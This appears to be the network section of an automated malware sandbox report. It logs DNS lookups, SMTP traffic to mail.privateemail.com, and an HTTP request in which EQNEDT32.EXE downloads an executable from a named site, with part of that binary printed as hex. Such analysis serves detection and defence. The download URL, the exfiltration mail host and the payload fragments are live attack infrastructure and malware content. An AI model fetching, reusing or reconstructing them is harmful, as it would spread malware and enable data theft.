Feb 4, 2021 09:06:49.810524940 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.810765982 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.814640045 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.814719915 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.814774036 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.814812899 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.816787958 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.816806078 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.816920042 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.816971064 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.817051888 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.817076921 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:50.001378059 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.001415968 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.001425028 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.001673937 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:50.005284071 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.005328894 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.005418062 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:50.005450010 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:50.007524967 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.007541895 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.007606983 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.007647991 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.007668018 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:50.007721901 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:50.007735968 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:50.009704113 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:50.192243099 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.192269087 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.192291975 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.192394972 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.193437099 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:50.195877075 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.195960999 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.195975065 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.196050882 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.198209047 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.198225021 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.198407888 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.198786020 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:50.200103045 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.384123087 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.389332056 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.407478094 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.611643076 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:50.797496080 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:50.990602016 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:50.990748882 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:51.183046103 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:51.183553934 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:51.374553919 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:51.374852896 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:51.375190973 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:51.566253901 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:51.567145109 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:51.758230925 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:51.758255005 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:51.758368015 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:51.760641098 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:51.765316963 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:51.951622009 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:51.951648951 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:51.956262112 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:51.956525087 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:51.957273006 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:52.148179054 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:52.149189949 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:52.150300026 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:52.341185093 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:52.344031096 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:52.344794989 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:52.535691977 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:52.538371086 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:52.541162968 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:52.732676029 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:52.755316019 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:52.756055117 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:52.947215080 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:52.948591948 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:52.949156046 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:52.949377060 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:52.949517012 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:52.949651957 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:52.954873085 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:53.141474009 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.141493082 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.141500950 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.141508102 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.141685009 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:53.145802021 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.145934105 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:53.332612038 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.332782984 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:53.336818933 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.336949110 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:53.523700953 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.523718119 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.523888111 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:53.527945042 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.527966976 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.527975082 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.528188944 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:53.714819908 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.714840889 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.714848042 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.714895964 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.715114117 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:53.719151974 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.719217062 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.719229937 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.719280005 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:53.719345093 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.720803022 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:53.906133890 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.906164885 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.906240940 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.906322956 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.906332016 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:53.907361031 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:53.910234928 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.911139011 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:53.911569118 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:53.911685944 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.911770105 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.911832094 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:53.911962032 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:53.912185907 CET	49171	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:54.097626925 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:54.098490953 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:54.098524094 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:54.098551035 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:54.098736048 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:54.102240086 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:54.102343082 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:54.102541924 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:54.102936029 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:54.103178978 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:54.111813068 CET	587	49171	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:54.309288025 CET	49171	587	192.168.2.22	198.54.122.60

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 4, 2021 09:05:18.077769041 CET	52197	53	192.168.2.22	8.8.8.8
Feb 4, 2021 09:05:18.358464003 CET	53	52197	8.8.8.8	192.168.2.22
Feb 4, 2021 09:05:18.359522104 CET	52197	53	192.168.2.22	8.8.8.8
Feb 4, 2021 09:05:18.418462038 CET	53	52197	8.8.8.8	192.168.2.22
Feb 4, 2021 09:06:18.699979067 CET	53099	53	192.168.2.22	8.8.8.8
Feb 4, 2021 09:06:18.754411936 CET	53	53099	8.8.8.8	192.168.2.22
Feb 4, 2021 09:06:18.755070925 CET	53099	53	192.168.2.22	8.8.8.8
Feb 4, 2021 09:06:18.809508085 CET	53	53099	8.8.8.8	192.168.2.22
Feb 4, 2021 09:06:25.459070921 CET	52838	53	192.168.2.22	8.8.8.8
Feb 4, 2021 09:06:25.507716894 CET	53	52838	8.8.8.8	192.168.2.22
Feb 4, 2021 09:06:25.508407116 CET	52838	53	192.168.2.22	8.8.8.8
Feb 4, 2021 09:06:25.557894945 CET	53	52838	8.8.8.8	192.168.2.22
Feb 4, 2021 09:06:27.366553068 CET	61200	53	192.168.2.22	8.8.8.8
Feb 4, 2021 09:06:27.412307024 CET	53	61200	8.8.8.8	192.168.2.22
Feb 4, 2021 09:06:27.422513962 CET	49548	53	192.168.2.22	8.8.8.8
Feb 4, 2021 09:06:27.468251944 CET	53	49548	8.8.8.8	192.168.2.22
Feb 4, 2021 09:06:33.604418039 CET	55627	53	192.168.2.22	8.8.8.8
Feb 4, 2021 09:06:33.652976990 CET	53	55627	8.8.8.8	192.168.2.22
Feb 4, 2021 09:06:33.654062033 CET	55627	53	192.168.2.22	8.8.8.8
Feb 4, 2021 09:06:33.703283072 CET	53	55627	8.8.8.8	192.168.2.22
Feb 4, 2021 09:06:42.980549097 CET	56009	53	192.168.2.22	8.8.8.8
Feb 4, 2021 09:06:43.036653042 CET	53	56009	8.8.8.8	192.168.2.22
Feb 4, 2021 09:06:50.679749012 CET	61865	53	192.168.2.22	8.8.8.8
Feb 4, 2021 09:06:50.736995935 CET	53	61865	8.8.8.8	192.168.2.22
Feb 4, 2021 09:06:50.737974882 CET	61865	53	192.168.2.22	8.8.8.8
Feb 4, 2021 09:06:50.795156002 CET	53	61865	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 4, 2021 09:05:18.077769041 CET	192.168.2.22	8.8.8.8	0x71dd	Standard query (0)	globalteamacademy.com	A (IP address)	IN (0x0001)
Feb 4, 2021 09:05:18.359522104 CET	192.168.2.22	8.8.8.8	0x71dd	Standard query (0)	globalteamacademy.com	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:18.699979067 CET	192.168.2.22	8.8.8.8	0x5ccc	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:18.755070925 CET	192.168.2.22	8.8.8.8	0x5ccc	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:25.459070921 CET	192.168.2.22	8.8.8.8	0x55fe	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:25.508407116 CET	192.168.2.22	8.8.8.8	0x55fe	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:33.604418039 CET	192.168.2.22	8.8.8.8	0xb521	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:33.654062033 CET	192.168.2.22	8.8.8.8	0xb521	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:42.980549097 CET	192.168.2.22	8.8.8.8	0x27c7	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:50.679749012 CET	192.168.2.22	8.8.8.8	0x8611	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:50.737974882 CET	192.168.2.22	8.8.8.8	0x8611	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 4, 2021 09:05:18.358464003 CET	8.8.8.8	192.168.2.22	0x71dd	No error (0)	globalteamacademy.com	43.252.37.193	A (IP address)	IN (0x0001)
Feb 4, 2021 09:05:18.418462038 CET	8.8.8.8	192.168.2.22	0x71dd	No error (0)	globalteamacademy.com	43.252.37.193	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:18.754411936 CET	8.8.8.8	192.168.2.22	0x5ccc	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:18.809508085 CET	8.8.8.8	192.168.2.22	0x5ccc	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:25.507716894 CET	8.8.8.8	192.168.2.22	0x55fe	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:25.557894945 CET	8.8.8.8	192.168.2.22	0x55fe	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:33.652976990 CET	8.8.8.8	192.168.2.22	0xb521	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:33.703283072 CET	8.8.8.8	192.168.2.22	0xb521	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:43.036653042 CET	8.8.8.8	192.168.2.22	0x27c7	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:50.736995935 CET	8.8.8.8	192.168.2.22	0x8611	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 4, 2021 09:06:50.795156002 CET	8.8.8.8	192.168.2.22	0x8611	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

globalteamacademy.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	43.252.37.193	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 4, 2021 09:05:18.637748003 CET	0	OUT	GET /docct/uzz/E6RVLMWo0fz1jFA.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: globalteamacademy.com Connection: Keep-Alive
Feb 4, 2021 09:05:18.844858885 CET	2	IN	HTTP/1.1 200 OK Date: Thu, 04 Feb 2021 08:05:20 GMT Server: Apache Last-Modified: Wed, 03 Feb 2021 23:50:23 GMT Accept-Ranges: bytes Content-Length: 1079808 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e3 35 1b 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 5e 0c 00 00 1a 04 00 00 00 00 00 12 7d 0c 00 00 20 00 00 00 80 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 10 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 7c 0c 00 4f 00 00 00 00 80 0c 00 30 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 10 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 5d 0c 00 00 20 00 00 00 5e 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 30 16 04 00 00 80 0c 00 00 18 04 00 00 60 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 10 00 00 02 00 00 00 78 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 7c 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 87 01 00 00 6a 01 00 03 00 00 00 01 00 00 06 f0 f1 02 00 d0 8a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2c 00 00 0a 28 2d 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2e 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2f 00 00 0a 00 02 16 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 17 28 32 00 00 0a 00 02 16 28 33 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 10 03 00 06 28 34 00 00 0a 00 2a 26 00 02 28 35 00 00 0a 00 2a ce 73 36 00 00 0a 80 01 00 00 04 73 37 00 00 0a 80 02 00 00 04 73 38 00 00 0a 80 03 00 00 04 73 39 00 00 0a 80 04 00 00 04 73 3a 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3f 00 00 0a 0a 2b 00 06 2a 26 00 02 28 40 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 41 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 42 00 00 0a 6f 43 00 00 0a 73 44 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0c 00 00 06 72 39 00 00 70 7e 07 00 00 04 6f 45 00 00 0a 28 46 00 00 0a 0b 07 74 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5`P^} @ @\|O0 H.text] ^ `.rsrc0`@@.relocx@B\|Hj0(,(-(o.(/(0(1(2(3N(o(4&(5s6s7s8s9s:0~o;+0~o<+0~o=+0~o>+0~o?+&(@0<~(A,!rp(BoCsD~+0~+"0&(r9p~oE(Ft
Feb 4, 2021 09:05:18.844906092 CET	3	IN	Data Raw: 26 00 00 01 0a 2b 00 06 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 08 00 00 04 14 28 41 00 00 0a 0b 07 2c 21 72 4f 00 00 70 d0 06 00 00 02 28 42 00 00 0a 6f 43 00 00 0a 73 44 00 00 0a 0c 08 80 08 00 00 04 00 00 7e 08 00 00 04 0a 2b 00 06 Data Ascii: &+0<~(A,!rOp(BoCsD~+0~+"0&(rp~oE(Ft&+s(Gts@(F(H*0(oI,(
Feb 4, 2021 09:05:18.844935894 CET	5	IN	Data Raw: 0c 20 ed 01 00 00 73 66 00 00 0a 6f 67 00 00 0a 00 02 6f 25 00 00 06 72 5e 02 00 70 6f 68 00 00 0a 00 02 6f 25 00 00 06 1f 62 1f 1d 73 69 00 00 0a 6f 6a 00 00 0a 00 02 6f 25 00 00 06 1f 1a 6f 6b 00 00 0a 00 02 6f 25 00 00 06 72 6e 02 00 70 6f 71 Data Ascii: sfogo%r^poho%bsiojo%oko%rnpoqo%opo'oeo' Vsfogo'rxpoho' 9lsiojo'oko'rpolo)rpomtono)
Feb 4, 2021 09:05:18.844969988 CET	6	IN	Data Raw: 28 86 00 00 0a 00 02 20 c9 03 00 00 20 10 02 00 00 73 69 00 00 0a 28 87 00 00 0a 00 02 28 88 00 00 0a 02 6f 33 00 00 06 6f 89 00 00 0a 00 02 28 88 00 00 0a 02 6f 31 00 00 06 6f 89 00 00 0a 00 02 28 88 00 00 0a 02 6f 2f 00 00 06 6f 89 00 00 0a 00 Data Ascii: ( si((o3o(o1o(o/o(o-o(o+o(o'o(o)o(o%o(o!o(o#o(oo(oo
Feb 4, 2021 09:05:18.845004082 CET	7	IN	Data Raw: 00 0a 26 08 14 72 04 05 00 70 17 8d 19 00 00 01 25 16 02 7b 26 00 00 04 1b 6f 9e 00 00 0a a2 14 14 14 17 28 9f 00 00 0a 26 08 14 72 04 05 00 70 17 8d 19 00 00 01 25 16 02 7b 26 00 00 04 1c 6f 9e 00 00 0a a2 14 14 14 17 28 9f 00 00 0a 26 00 14 0c Data Ascii: &rp%{&o(&rp%{&o(&{&o:{!o&(Cf(oo(J(oo0^{!orp{!s}"rprp (
Feb 4, 2021 09:05:18.845041037 CET	9	IN	Data Raw: 55 00 00 0a 7d 3f 00 00 04 02 73 56 00 00 0a 7d 40 00 00 04 02 73 57 00 00 0a 7d 42 00 00 04 02 73 58 00 00 0a 7d 43 00 00 04 02 28 4c 00 00 06 00 2a 00 1b 30 02 00 31 00 00 00 09 00 00 11 00 00 03 2c 0b 02 7b 27 00 00 04 14 fe 03 2b 01 16 0a 06 Data Ascii: U}?sV}@sW}BsX}C(L01,{'+,{'oY(Z$%0H(Bs[s\oNs\oPs]oRsoTsoVs\oXs\oZ
Feb 4, 2021 09:05:18.845078945 CET	10	IN	Data Raw: 6f 67 00 00 0a 00 02 6f 5b 00 00 06 72 e7 07 00 70 6f 68 00 00 0a 00 02 6f 5b 00 00 06 20 92 00 00 00 1f 3d 73 69 00 00 0a 6f 6a 00 00 0a 00 02 6f 5b 00 00 06 16 6f 6b 00 00 0a 00 02 6f 5d 00 00 06 6f 88 00 00 0a 02 6f 77 00 00 06 6f 89 00 00 0a Data Ascii: ogo[rpoho[ =siojo[oko]oowoo]oouoo]oo_oo]ooaoo]oocoo]ooeoo]oogoo]ooio
Feb 4, 2021 09:05:18.845119953 CET	12	IN	Data Raw: e7 00 00 00 1f 3d 73 69 00 00 0a 6f 6a 00 00 0a 00 02 6f 6d 00 00 06 16 6f 6b 00 00 0a 00 02 6f 6f 00 00 06 1f 12 20 9c 00 00 00 73 66 00 00 0a 6f 67 00 00 0a 00 02 6f 6f 00 00 06 72 4c 02 00 70 6f 68 00 00 0a 00 02 6f 6f 00 00 06 20 9e 00 00 00 Data Ascii: =siojomokoo sfogoorLpohoo =siojoookoq(yozoqo}oqo~oq sfogoqrpohoq siojoqokoqo
Feb 4, 2021 09:05:18.845156908 CET	13	IN	Data Raw: 03 7d 3a 00 00 04 2a 26 02 7b 3b 00 00 04 2b 00 2a 13 30 02 00 37 00 00 00 0e 00 00 11 02 fe 06 7f 00 00 06 73 53 00 00 0a 0a 02 7b 3b 00 00 04 0b 07 2c 07 07 06 6f 94 00 00 0a 02 03 7d 3b 00 00 04 02 7b 3b 00 00 04 0b 07 2c 07 07 06 6f 95 00 00 Data Ascii: }:&{;+07sS{;,o};{;,o&{<+"}<&{=+"}=&{>+"}>*0{?o{@{?orpooqoo{@o}D+Yoq
Feb 4, 2021 09:05:18.845200062 CET	14	IN	Data Raw: 11 04 2c 0e 72 d6 0b 00 70 16 14 28 bd 00 00 0a 26 00 00 02 7b 3f 00 00 04 6f a4 00 00 0a 00 02 28 a6 00 00 0a 00 28 09 00 00 06 6f 0a 03 00 06 6f 09 02 00 06 00 2a 26 00 02 28 a6 00 00 0a 00 2a 56 72 ea 0b 00 70 80 45 00 00 04 72 4c 0c 00 70 80 Data Ascii: ,rp(&{?o((oo&(VrpErLpF(@Z(@((&0mrZporp((rp( %%%~E%~F%rpo& +
